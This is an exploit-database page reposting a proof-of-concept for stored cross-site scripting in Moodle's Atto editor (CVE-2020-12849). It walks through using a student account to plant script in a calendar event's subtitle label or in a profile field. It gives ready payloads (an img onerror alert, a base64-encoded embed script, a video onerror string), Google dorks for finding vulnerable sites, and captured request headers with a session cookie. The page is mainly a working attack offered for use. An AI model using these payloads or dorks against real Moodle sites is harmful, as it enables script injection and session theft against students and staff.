Moodle Atto Editor Cross Site Scripting

CVE Category Price Severity
CVE-2020-12849 CWE-79 $500 High
Author Risk Exploitation Type Date
John Doe High Remote 2021-03-26
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:L 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at:

Below is a copy:

Moodle Atto Editor Cross Site Scripting
# Exploit Title: Moodle  Atto Editor Cross Site Scripting
# Date: 26.03.2021
# Author: Vincent666 ibn Winnie
# Software Link:
# Tested on: Windows 10
# Web Browser: Mozilla Firefox
# Google Dorks: inurl:/lib/editor/atto/plugins/managefiles/ or calendar/view.php?view=month
# My Youtube Channel:


Video PoC: (Update)

Stored XSS in Atto Editor (default editor)

Use Demo:

Choose a role : Student (example)

Open calendar :

Create new event:


Event Title "Test"

Description :Choose Insert Video File and choose Video:

Video Source Url you can paste video link from youtube

And open Subtitles and Captions:

Subtitle track URL use video link from youtube

Field Label : There is we can use xss code:

<img src="1" onerror="alert(1)" />

or try in base64

<embed src="data:text/html;base64,PHNjcmlwdD5hbGVydCgiWFNTIik7PC9zY3JpcHQ+" type="image/svg+xml" AllowScriptAccess="always"></embed>

Insert Media and save this. 

Open event and get stored xss. 

Or we can use Profile:

Field Label in the Editor vulnerable to XSS. 

We can use XSS and js redirect in the profile:

"><video src/onerror=alert(1)><img src=x'');>



User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0

Accept: application/json, text/javascript, */*; q=0.01

Accept-Language: en-US;q=0.5,en;q=0.3

Accept-Encoding: gzip, deflate, br

Content-Type: application/json

X-Requested-With: XMLHttpRequest

Content-Length: 996


Connection: keep-alive


Cookie: MoodleSession=4ea0036558425526decc096ed375b886; EU_COOKIE_LAW_CONSENT=true


Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.